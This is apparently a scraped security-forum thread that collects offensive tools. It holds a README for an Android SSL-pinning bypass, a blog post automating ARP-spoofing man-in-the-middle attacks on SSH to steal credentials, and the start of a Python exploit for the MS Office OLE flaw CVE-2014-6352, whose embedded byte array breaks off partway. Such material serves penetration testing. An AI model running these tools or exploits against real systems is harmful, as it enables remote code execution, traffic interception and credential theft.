private/security/schannel/utillib/test.c
private/security/schannel/pkiutil/pkialloc.cpp
private/security/schannel/pkiutil/pkiasn1.cpp

Please, for your own sake, don't call my bluff Microsoft!

Sursa: SChannelShenanigans - Pastebin.com
-
Android-SSL-TrustKiller

Blackbox tool to bypass SSL certificate pinning for most applications running on a device.

Description

This tool leverages Cydia Substrate to hook various methods in order to bypass certificate pinning by accepting any SSL certificate.

Usage

1. Ensure that Cydia Substrate has been deployed on your test device. The installer requires a rooted device and can be found on the Google Play store at https://play.google.com/store/apps/details?id=com.saurik.substrate&hl=en
2. Download the pre-compiled APK available at https://github.com/iSECPartners/Android-SSL-TrustKiller/releases
3. Install the APK package on the device: adb install Android-SSL-TrustKiller.apk
4. Add the CA certificate of your proxy tool to the device's trust store.

Notes

Use only on test devices, as anyone on the same network can intercept traffic from a number of applications, including Google apps. This extension will soon be integrated into Introspy-Android (https://github.com/iSECPartners/Introspy-Android) in order to allow you to proxy only selected applications.

License

See ./LICENSE.

Authors

Marc Blanchou

Source: https://github.com/iSECPartners/Android-SSL-TrustKiller
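For context, certificate pinning is essentially a comparison of the server's presented certificate against a hardcoded value; the hooked methods normally perform a check like the one sketched below and the tool makes them succeed unconditionally. This is a minimal illustration in Python rather than the Android Java the tool actually hooks, and `PINNED_SHA256` is a hypothetical placeholder:

```python
# Sketch of the check a pinned client performs and that the hook defeats:
# hash the server's DER-encoded certificate and compare it against a
# hardcoded ("pinned") digest. PINNED_SHA256 is a hypothetical value.
import hashlib

PINNED_SHA256 = "ab" * 32  # hypothetical pinned digest, not a real pin


def pin_matches(der_cert_bytes, pinned_hex=PINNED_SHA256):
    """Return True if the certificate's SHA-256 digest equals the pin."""
    return hashlib.sha256(der_cert_bytes).hexdigest() == pinned_hex.lower()
```

Because the bypass accepts any certificate, adding the proxy tool's CA to the trust store (step 4 above) is then enough for the proxied TLS sessions to complete.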
-
@Ganav
-
Automating Man-in-the-Middle SSHv2 attacks

Recently, during an internal penetration test, I was performing ARP spoofing and found an SSH connection from the administrator's computer to another box. That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing. I came across the article below about performing ARP spoofing and MITM-ing SSH connections to steal credentials. The victim does get an alert message saying that there is a key mismatch, but most people just ignore them anyway. SSH2 "MITM" like attack with JMITM2 | woFF

In the article, he uses software called JMITM2 (david-guembel.de: jmitm2), which acts like a honeypot that proxies SSH connections between the victim and the target SSH server. However, there are a number of steps that must be done manually to execute this attack during an internal penetration test:

1. Check if the network is vulnerable to ARP spoofing
2. Check if there are any active SSH connections in the network
3. Identify the victim computer and SSH server
4. Modify the configuration files of JMITM2
5. Modify iptables
6. Perform ARP spoofing
7. Check the JMITM2 console for credentials
8. Re-ARP the router and victim host with the correct MAC addresses of each

It would save a great amount of time to automate these steps, so I wrote a script that does just that. Running the command below checks the network for active SSH connections (via ARP spoofing), then automates the whole attack and outputs any captured credentials to the console.

python2.7 mitmSSH.py -analyze

If you know the victim host IP and SSH server, you can use the command below instead:

python2.7 mitmSSH.py -host victims -ssh sshServerIP

This script has only been tested on Kali Linux. There are a couple of things still in the works to improve the script:

1. Switching from intercepter-ng to scapy for ARP spoofing.
The script can be grabbed from the link below:

https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py

Source: Automating Man-in-the-Middle SSHv2 attacks | Milo2012's Security Blog
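The ARP-spoofing step the script automates boils down to sending forged "is-at" replies to the victim and the gateway. A standard-library sketch of building such a frame (the script itself drives intercepter-ng, with a planned move to scapy; actually sending this requires a raw socket and root):

```python
# Sketch of a forged ARP reply: tell victim_mac that spoofed_ip "is at"
# attacker_mac. This only builds the frame; sending it needs a raw
# socket (AF_PACKET) and root privileges.
import struct


def forged_arp_reply(attacker_mac, victim_mac, spoofed_ip, victim_ip):
    """Return raw Ethernet + ARP bytes for a spoofed is-at reply."""
    eth = victim_mac + attacker_mac + b"\x08\x06"      # dst, src, EtherType=ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)    # Ethernet/IPv4, op=2 (reply)
    arp += attacker_mac + bytes(map(int, spoofed_ip.split(".")))  # sender pair
    arp += victim_mac + bytes(map(int, victim_ip.split(".")))     # target pair
    return eth + arp
```

Sending one such frame each to the victim (claiming the gateway's IP) and to the gateway (claiming the victim's IP) poisons both ARP caches, which is what lets JMITM2 sit in the middle; step 8 above reverses this by sending replies with the correct MACs.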
-
@giv
-
[h=1]MS Office 2007 and 2010 - OLE Arbitrary Command Execution[/h]

#
# Full exploit: http://www.exploit-db.com/sploits/35216.rar
#
# CVE-2014-6352 OLE Remote Code Execution
# Author: Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
# Advanced Hacking Trainings - http://training.aslitsecurity.com
# Web - http://www.aslitsecurity.com/
# Blog - http://www.aslitsecurity.blogspot.com/
# Tested on Win7 with Office 2007 and 2010. The exploit will not give a UAC warning if the user account is an administrator; otherwise there will be a UAC warning.
# No .inf file is required in this exploit.
# The size of the executable payload should be less than 400 KB.
# Python 2.7 required.
# The folder "temp" should be in the same dir as this python file.
# Usage: python.exe CVE-2014-6352.py (name of exe)

#!/usr/bin/python
import os
import sys
import shutil

oleole = (
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00"
"\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00"
"\x00\x00\x08\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF" "\xFD\xFF\xFF\xFF\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00\x11\x00" "\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00" "\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00" "\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00\x29\x00\x00\x00\x2A\x00\x00\x00" "\x2B\x00\x00\x00\x2C\x00\x00\x00\x2D\x00\x00\x00\x2E\x00\x00\x00\x2F\x00\x00\x00\x30\x00\x00\x00\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00" "\x00\x00\x34\x00\x00\x00\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00\x39\x00\x00\x00\x3A\x00\x00\x00\x3B\x00\x00\x00" 
"\x3C\x00\x00\x00\x3D\x00\x00\x00\x3E\x00\x00\x00\x3F\x00\x00\x00\x40\x00\x00\x00\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00" "\x00\x00\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00\x49\x00\x00\x00\x4A\x00\x00\x00\x4B\x00\x00\x00\x4C\x00\x00\x00" "\x4D\x00\x00\x00\x4E\x00\x00\x00\x4F\x00\x00\x00\x50\x00\x00\x00\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00\x55\x00" "\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00\x59\x00\x00\x00\x5A\x00\x00\x00\x5B\x00\x00\x00\x5C\x00\x00\x00\x5D\x00\x00\x00" "\x5E\x00\x00\x00\x5F\x00\x00\x00\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00" "\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00\x69\x00\x00\x00\x6A\x00\x00\x00\x6B\x00\x00\x00\x6C\x00\x00\x00\x6D\x00\x00\x00\x6E\x00\x00\x00" "\x6F\x00\x00\x00\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00" "\x00\x00\x78\x00\x00\x00\x79\x00\x00\x00\x7A\x00\x00\x00\x7B\x00\x00\x00\x7C\x00\x00\x00\x7D\x00\x00\x00\x7E\x00\x00\x00\x7F\x00\x00\x00" "\x80\x00\x00\x00\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x16\x00\x05\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x0C\x00\x03\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x8D\xED\x42\xD9\xF8\xCF\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x4F\x00" "\x6C\x00\x65\x00\x31\x00\x30\x00\x4E\x00\x61\x00\x74\x00\x69\x00\x76\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x02\x01\xFF\xFF\xFF\xFF" 
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x1D\x91\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00" "\x88\x00\x00\x00\x89\x00\x00\x00\x8A\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x8E\x00\x00\x00\x8F\x00\x00\x00\x90\x00" "\x00\x00\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" "\x99\x00\x00\x00\x9A\x00\x00\x00\x9B\x00\x00\x00\x9C\x00\x00\x00\x9D\x00\x00\x00\x9E\x00\x00\x00\x9F\x00\x00\x00\xA0\x00\x00\x00\xA1\x00" "\x00\x00\xA2\x00\x00\x00\xA3\x00\x00\x00\xA4\x00\x00\x00\xA5\x00\x00\x00\xA6\x00\x00\x00\xA7\x00\x00\x00\xA8\x00\x00\x00\xA9\x00\x00\x00" 
"\xAA\x00\x00\x00\xAB\x00\x00\x00\xAC\x00\x00\x00\xAD\x00\x00\x00\xAE\x00\x00\x00\xAF\x00\x00\x00\xB0\x00\x00\x00\xB1\x00\x00\x00\xB2\x00" "\x00\x00\xB3\x00\x00\x00\xB4\x00\x00\x00\xB5\x00\x00\x00\xB6\x00\x00\x00\xB7\x00\x00\x00\xB8\x00\x00\x00\xB9\x00\x00\x00\xBA\x00\x00\x00" "\xBB\x00\x00\x00\xBC\x00\x00\x00\xBD\x00\x00\x00\xBE\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xC1\x00\x00\x00\xC2\x00\x00\x00\xC3\x00" "\x00\x00\xC4\x00\x00\x00\xC5\x00\x00\x00\xC6\x00\x00\x00\xC7\x00\x00\x00\xC8\x00\x00\x00\xC9\x00\x00\x00\xCA\x00\x00\x00\xCB\x00\x00\x00" "\xCC\x00\x00\x00\xCD\x00\x00\x00\xCE\x00\x00\x00\xCF\x00\x00\x00\xD0\x00\x00\x00\xD1\x00\x00\x00\xD2\x00\x00\x00\xD3\x00\x00\x00\xD4\x00" "\x00\x00\xD5\x00\x00\x00\xD6\x00\x00\x00\xD7\x00\x00\x00\xD8\x00\x00\x00\xD9\x00\x00\x00\xDA\x00\x00\x00\xDB\x00\x00\x00\xDC\x00\x00\x00" "\xDD\x00\x00\x00\xDE\x00\x00\x00\xDF\x00\x00\x00\xE0\x00\x00\x00\xE1\x00\x00\x00\xE2\x00\x00\x00\xE3\x00\x00\x00\xE4\x00\x00\x00\xE5\x00" "\x00\x00\xE6\x00\x00\x00\xE7\x00\x00\x00\xE8\x00\x00\x00\xE9\x00\x00\x00\xEA\x00\x00\x00\xEB\x00\x00\x00\xEC\x00\x00\x00\xED\x00\x00\x00" "\xEE\x00\x00\x00\xEF\x00\x00\x00\xF0\x00\x00\x00\xF1\x00\x00\x00\xF2\x00\x00\x00\xF3\x00\x00\x00\xF4\x00\x00\x00\xF5\x00\x00\x00\xF6\x00" "\x00\x00\xF7\x00\x00\x00\xF8\x00\x00\x00\xF9\x00\x00\x00\xFA\x00\x00\x00\xFB\x00\x00\x00\xFC\x00\x00\x00\xFD\x00\x00\x00\xFE\x00\x00\x00" "\xFF\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x02\x01\x00\x00\x03\x01\x00\x00\x04\x01\x00\x00\x05\x01\x00\x00\x06\x01\x00\x00\x07\x01" "\x00\x00\x08\x01\x00\x00\x09\x01\x00\x00\x0A\x01\x00\x00\x0B\x01\x00\x00\x0C\x01\x00\x00\x0D\x01\x00\x00\x0E\x01\x00\x00\x0F\x01\x00\x00" "\x10\x01\x00\x00\x11\x01\x00\x00\x12\x01\x00\x00\x13\x01\x00\x00\x14\x01\x00\x00\x15\x01\x00\x00\x16\x01\x00\x00\x17\x01\x00\x00\x18\x01" "\x00\x00\x19\x01\x00\x00\x1A\x01\x00\x00\x1B\x01\x00\x00\x1C\x01\x00\x00\x1D\x01\x00\x00\x1E\x01\x00\x00\x1F\x01\x00\x00\x20\x01\x00\x00" 
"\x21\x01\x00\x00\x22\x01\x00\x00\x23\x01\x00\x00\x24\x01\x00\x00\x25\x01\x00\x00\x26\x01\x00\x00\x27\x01\x00\x00\x28\x01\x00\x00\x29\x01" "\x00\x00\x2A\x01\x00\x00\x2B\x01\x00\x00\x2C\x01\x00\x00\x2D\x01\x00\x00\x2E\x01\x00\x00\x2F\x01\x00\x00\x30\x01\x00\x00\x31\x01\x00\x00" "\x32\x01\x00\x00\x33\x01\x00\x00\x34\x01\x00\x00\x35\x01\x00\x00\x36\x01\x00\x00\x37\x01\x00\x00\x38\x01\x00\x00\x39\x01\x00\x00\x3A\x01" "\x00\x00\x3B\x01\x00\x00\x3C\x01\x00\x00\x3D\x01\x00\x00\x3E\x01\x00\x00\x3F\x01\x00\x00\x40\x01\x00\x00\x41\x01\x00\x00\x42\x01\x00\x00" "\x43\x01\x00\x00\x44\x01\x00\x00\x45\x01\x00\x00\x46\x01\x00\x00\x47\x01\x00\x00\x48\x01\x00\x00\x49\x01\x00\x00\x4A\x01\x00\x00\x4B\x01" "\x00\x00\x4C\x01\x00\x00\x4D\x01\x00\x00\x4E\x01\x00\x00\x4F\x01\x00\x00\x50\x01\x00\x00\x51\x01\x00\x00\x52\x01\x00\x00\x53\x01\x00\x00" "\x54\x01\x00\x00\x55\x01\x00\x00\x56\x01\x00\x00\x57\x01\x00\x00\x58\x01\x00\x00\x59\x01\x00\x00\x5A\x01\x00\x00\x5B\x01\x00\x00\x5C\x01" "\x00\x00\x5D\x01\x00\x00\x5E\x01\x00\x00\x5F\x01\x00\x00\x60\x01\x00\x00\x61\x01\x00\x00\x62\x01\x00\x00\x63\x01\x00\x00\x64\x01\x00\x00" "\x65\x01\x00\x00\x66\x01\x00\x00\x67\x01\x00\x00\x68\x01\x00\x00\x69\x01\x00\x00\x6A\x01\x00\x00\x6B\x01\x00\x00\x6C\x01\x00\x00\x6D\x01" "\x00\x00\x6E\x01\x00\x00\x6F\x01\x00\x00\x70\x01\x00\x00\x71\x01\x00\x00\x72\x01\x00\x00\x73\x01\x00\x00\x74\x01\x00\x00\x75\x01\x00\x00" "\x76\x01\x00\x00\x77\x01\x00\x00\x78\x01\x00\x00\x79\x01\x00\x00\x7A\x01\x00\x00\x7B\x01\x00\x00\x7C\x01\x00\x00\x7D\x01\x00\x00\x7E\x01" "\x00\x00\x7F\x01\x00\x00\x80\x01\x00\x00\x81\x01\x00\x00\x82\x01\x00\x00\x83\x01\x00\x00\x84\x01\x00\x00\x85\x01\x00\x00\x86\x01\x00\x00" "\x87\x01\x00\x00\x88\x01\x00\x00\x89\x01\x00\x00\x8A\x01\x00\x00\x8B\x01\x00\x00\x8C\x01\x00\x00\x8D\x01\x00\x00\x8E\x01\x00\x00\x8F\x01" "\x00\x00\x90\x01\x00\x00\x91\x01\x00\x00\x92\x01\x00\x00\x93\x01\x00\x00\x94\x01\x00\x00\x95\x01\x00\x00\x96\x01\x00\x00\x97\x01\x00\x00" 
"\x98\x01\x00\x00\x99\x01\x00\x00\x9A\x01\x00\x00\x9B\x01\x00\x00\x9C\x01\x00\x00\x9D\x01\x00\x00\x9E\x01\x00\x00\x9F\x01\x00\x00\xA0\x01" "\x00\x00\xA1\x01\x00\x00\xA2\x01\x00\x00\xA3\x01\x00\x00\xA4\x01\x00\x00\xA5\x01\x00\x00\xA6\x01\x00\x00\xA7\x01\x00\x00\xA8\x01\x00\x00" "\xA9\x01\x00\x00\xAA\x01\x00\x00\xAB\x01\x00\x00\xAC\x01\x00\x00\xAD\x01\x00\x00\xAE\x01\x00\x00\xAF\x01\x00\x00\xB0\x01\x00\x00\xB1\x01" "\x00\x00\xB2\x01\x00\x00\xB3\x01\x00\x00\xB4\x01\x00\x00\xB5\x01\x00\x00\xB6\x01\x00\x00\xB7\x01\x00\x00\xB8\x01\x00\x00\xB9\x01\x00\x00" "\xBA\x01\x00\x00\xBB\x01\x00\x00\xBC\x01\x00\x00\xBD\x01\x00\x00\xBE\x01\x00\x00\xBF\x01\x00\x00\xC0\x01\x00\x00\xC1\x01\x00\x00\xC2\x01" "\x00\x00\xC3\x01\x00\x00\xC4\x01\x00\x00\xC5\x01\x00\x00\xC6\x01\x00\x00\xC7\x01\x00\x00\xC8\x01\x00\x00\xC9\x01\x00\x00\xCA\x01\x00\x00" "\xCB\x01\x00\x00\xCC\x01\x00\x00\xCD\x01\x00\x00\xCE\x01\x00\x00\xCF\x01\x00\x00\xD0\x01\x00\x00\xD1\x01\x00\x00\xD2\x01\x00\x00\xD3\x01" "\x00\x00\xD4\x01\x00\x00\xD5\x01\x00\x00\xD6\x01\x00\x00\xD7\x01\x00\x00\xD8\x01\x00\x00\xD9\x01\x00\x00\xDA\x01\x00\x00\xDB\x01\x00\x00" "\xDC\x01\x00\x00\xDD\x01\x00\x00\xDE\x01\x00\x00\xDF\x01\x00\x00\xE0\x01\x00\x00\xE1\x01\x00\x00\xE2\x01\x00\x00\xE3\x01\x00\x00\xE4\x01" "\x00\x00\xE5\x01\x00\x00\xE6\x01\x00\x00\xE7\x01\x00\x00\xE8\x01\x00\x00\xE9\x01\x00\x00\xEA\x01\x00\x00\xEB\x01\x00\x00\xEC\x01\x00\x00" "\xED\x01\x00\x00\xEE\x01\x00\x00\xEF\x01\x00\x00\xF0\x01\x00\x00\xF1\x01\x00\x00\xF2\x01\x00\x00\xF3\x01\x00\x00\xF4\x01\x00\x00\xF5\x01" "\x00\x00\xF6\x01\x00\x00\xF7\x01\x00\x00\xF8\x01\x00\x00\xF9\x01\x00\x00\xFA\x01\x00\x00\xFB\x01\x00\x00\xFC\x01\x00\x00\xFD\x01\x00\x00" "\xFE\x01\x00\x00\xFF\x01\x00\x00\x00\x02\x00\x00\x01\x02\x00\x00\x02\x02\x00\x00\x03\x02\x00\x00\x04\x02\x00\x00\x05\x02\x00\x00\x06\x02" "\x00\x00\x07\x02\x00\x00\x08\x02\x00\x00\x09\x02\x00\x00\x0A\x02\x00\x00\x0B\x02\x00\x00\x0C\x02\x00\x00\x0D\x02\x00\x00\x0E\x02\x00\x00" 
"\x0F\x02\x00\x00\x10\x02\x00\x00\x11\x02\x00\x00\x12\x02\x00\x00\x13\x02\x00\x00\x14\x02\x00\x00\x15\x02\x00\x00\x16\x02\x00\x00\x17\x02" "\x00\x00\x18\x02\x00\x00\x19\x02\x00\x00\x1A\x02\x00\x00\x1B\x02\x00\x00\x1C\x02\x00\x00\x1D\x02\x00\x00\x1E\x02\x00\x00\x1F\x02\x00\x00" "\x20\x02\x00\x00\x21\x02\x00\x00\x22\x02\x00\x00\x23\x02\x00\x00\x24\x02\x00\x00\x25\x02\x00\x00\x26\x02\x00\x00\x27\x02\x00\x00\x28\x02" "\x00\x00\x29\x02\x00\x00\x2A\x02\x00\x00\x2B\x02\x00\x00\x2C\x02\x00\x00\x2D\x02\x00\x00\x2E\x02\x00\x00\x2F\x02\x00\x00\x30\x02\x00\x00" "\x31\x02\x00\x00\x32\x02\x00\x00\x33\x02\x00\x00\x34\x02\x00\x00\x35\x02\x00\x00\x36\x02\x00\x00\x37\x02\x00\x00\x38\x02\x00\x00\x39\x02" "\x00\x00\x3A\x02\x00\x00\x3B\x02\x00\x00\x3C\x02\x00\x00\x3D\x02\x00\x00\x3E\x02\x00\x00\x3F\x02\x00\x00\x40\x02\x00\x00\x41\x02\x00\x00" "\x42\x02\x00\x00\x43\x02\x00\x00\x44\x02\x00\x00\x45\x02\x00\x00\x46\x02\x00\x00\x47\x02\x00\x00\x48\x02\x00\x00\x49\x02\x00\x00\x4A\x02" "\x00\x00\x4B\x02\x00\x00\x4C\x02\x00\x00\x4D\x02\x00\x00\x4E\x02\x00\x00\x4F\x02\x00\x00\x50\x02\x00\x00\x51\x02\x00\x00\x52\x02\x00\x00" "\x53\x02\x00\x00\x54\x02\x00\x00\x55\x02\x00\x00\x56\x02\x00\x00\x57\x02\x00\x00\x58\x02\x00\x00\x59\x02\x00\x00\x5A\x02\x00\x00\x5B\x02" "\x00\x00\x5C\x02\x00\x00\x5D\x02\x00\x00\x5E\x02\x00\x00\x5F\x02\x00\x00\x60\x02\x00\x00\x61\x02\x00\x00\x62\x02\x00\x00\x63\x02\x00\x00" "\x64\x02\x00\x00\x65\x02\x00\x00\x66\x02\x00\x00\x67\x02\x00\x00\x68\x02\x00\x00\x69\x02\x00\x00\x6A\x02\x00\x00\x6B\x02\x00\x00\x6C\x02" "\x00\x00\x6D\x02\x00\x00\x6E\x02\x00\x00\x6F\x02\x00\x00\x70\x02\x00\x00\x71\x02\x00\x00\x72\x02\x00\x00\x73\x02\x00\x00\x74\x02\x00\x00" "\x75\x02\x00\x00\x76\x02\x00\x00\x77\x02\x00\x00\x78\x02\x00\x00\x79\x02\x00\x00\x7A\x02\x00\x00\x7B\x02\x00\x00\x7C\x02\x00\x00\x7D\x02" "\x00\x00\x7E\x02\x00\x00\x7F\x02\x00\x00\x80\x02\x00\x00\x81\x02\x00\x00\x82\x02\x00\x00\x83\x02\x00\x00\x84\x02\x00\x00\x85\x02\x00\x00" 
